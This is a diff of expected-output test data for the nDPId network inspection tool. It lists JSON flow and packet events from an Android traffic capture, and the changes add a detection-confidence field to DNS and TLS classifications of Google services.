-00875{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":174,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
-01380{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":176,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":423,"midstream":0,"ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","server_names":"*.google-analytics.com,*.fps.goog,app-measurement.com,fps.goog,google-analytics.com,googleoptimize.com,googletagmanager.com,service.urchin.com,ssl.google-analytics.com,urchin.com,www.google-analytics.com,www.googleoptimize.com,www.googletagmanager.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google-analytics.com","alpn":"http\/1.1","fingerprint":"B0:D9:D3:57:C2:34:87:2C:FB:F5:E6:BD:7F:9F:54:65:08:61:AF:01"}}
+00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":174,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
+01406{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":176,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":423,"midstream":0,"ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","server_names":"*.google-analytics.com,*.fps.goog,app-measurement.com,fps.goog,google-analytics.com,googleoptimize.com,googletagmanager.com,service.urchin.com,ssl.google-analytics.com,urchin.com,www.google-analytics.com,www.googleoptimize.com,www.googletagmanager.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google-analytics.com","alpn":"http\/1.1","fingerprint":"B0:D9:D3:57:C2:34:87:2C:FB:F5:E6:BD:7F:9F:54:65:08:61:AF:01"}}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1582454870649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454870649,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8g2dAAEAG9TTAqAIQ2O8meMFmFGxVMrY\/AAAAAKAC\/\/9uQgAAAgQFtAQCCAr\/\/zZYAAAAAAEDAwg="}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454870996,"flow_last_seen":1582454870996,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1582454870996,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1582454870996,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1582454870996,"pkt":"xiwDYGpkTGr2n\/YnCABFAABIq6dAAEARCZzAqAIQwKgCAY8FADUANFCq5z4BAAABAAAAAAAAB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAE="}
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454870996,"flow_last_seen":1582454870996,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1582454870996,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454870996,"flow_last_seen":1582454870996,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1582454870996,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1582454870998,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"ts_msec":1582454870998,"pkt":"TGr2n\/YnxiwDYGpkCABFAABYgb0AAEARc3bAqAIBwKgCEAA1jwUARA+05z6BgAABAAEAAAAAB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAHADAABAAEAAADaAATY7yZ4"}
-00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":201,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454870996,"flow_last_seen":1582454870998,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1582454870998,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
+00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":201,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454870996,"flow_last_seen":1582454870998,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1582454870998,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871042,"flow_last_seen":1582454871042,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454871042,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1582454871042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871042,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA83wxAAEAGmY\/AqAIQ2O8meIDaAbu5DOmwAAAAAKAC\/\/8p0AAAAgQFtAQCCAr\/\/za8AAAAAAEDAwg="}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871051,"flow_last_seen":1582454871051,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454871051,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1582454871051,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1582454871051,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBq69AAEARCZvAqAIQwKgCAX6cADUALTLn3DQBAAABAAAAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAQ=="}
-00737{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871051,"flow_last_seen":1582454871051,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454871051,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871051,"flow_last_seen":1582454871051,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454871051,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1582454871056,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871056,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA84WAAAHcGoDvY7yZ4wKgCEAG7gNr8u4aauQzpsaAS6yCywwAAAgQFZAQCCAqJFH+\/\/\/82vAEDAwg="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1582454871057,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454871057,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA03w1AAEAGmZbAqAIQ2O8meIDaAbu5DOmx\/LuGm4AQAVfLBwAAAQEICv\/\/Nr+JFH+\/"}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1582454871058,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"ts_msec":1582454871058,"pkt":"MzMAAAACTGr2n\/Ynht1gAAAAABA6\/\/6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAAAChQAIygAAAAABAUxq9p\/2Jw=="}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871061,"flow_last_seen":1582454871061,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1582454871061,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1582454871061,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"ts_msec":1582454871061,"pkt":"xiwDYGpkTGr2n\/YnCABFAABGq7FAAEARCZTAqAIQwKgCAR3sADUAMs+l\/agBAAABAAAAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQAB"}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871061,"flow_last_seen":1582454871061,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1582454871061,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871061,"flow_last_seen":1582454871061,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1582454871061,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871069,"flow_last_seen":1582454871069,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454871069,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1582454871069,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871069,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8\/AdAAEAGfJTAqAIQ2O8meIDcAbs4lMrFAAAAAKAC\/\/\/JKwAAAgQFtAQCCAr\/\/zbCAAAAAAEDAwg="}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871075,"flow_last_seen":1582454871075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454871075,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -167,81 +167,81 @@
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1582454871088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871088,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8Nk0AAHcGS0\/Y7yZ4wKgCEAG7gN4gvysUCa7yzaAS6yD0TQAAAgQFZAQCCApclUhu\/\/82xAEDAwg="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1582454871089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454871089,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0xAlAAEAGtJrAqAIQ2O8meIDeAbsJrvLNIL8rFYAQAVcMkgAAAQEICv\/\/NsdclUhu"}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1582454871090,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"ts_msec":1582454871090,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRSjQAAEARqwbAqAIBwKgCEAA1fpwAPWeH3DSBgAABAAEAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAQMABK3CT3I="}
-00752{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":215,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871051,"flow_last_seen":1582454871090,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454871090,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.79.114"}}
+00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":215,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871051,"flow_last_seen":1582454871090,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454871090,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.79.114"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871094,"flow_last_seen":1582454871094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454871094,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1582454871094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871094,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8RuFAAEAGM+7AqAIQrcJPco\/iAFBu6HAoAAAAAKAC\/\/\/iBQAAAgQFtAQCCAr\/\/zbJAAAAAAEDAwg="}
 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1582454871100,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"ts_msec":1582454871100,"pkt":"TGr2n\/YnxiwDYGpkCABFAABWpmUAAEARTtDAqAIBwKgCEAA1HewAQssi\/aiBgAABAAEAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQABwAwAAQABAAABKwAErNkVyg=="}
-00757{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":217,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871061,"flow_last_seen":1582454871100,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1582454871100,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.21.202"}}
+00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":217,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871061,"flow_last_seen":1582454871100,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1582454871100,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.21.202"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871103,"flow_last_seen":1582454871103,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454871103,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1582454871103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871103,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8ApdAAEAGssnAqAIQrNkVysrYAbsvYjRcAAAAAKAC\/\/9bhgAAAgQFtAQCCAr\/\/zbLAAAAAAEDAwg="}
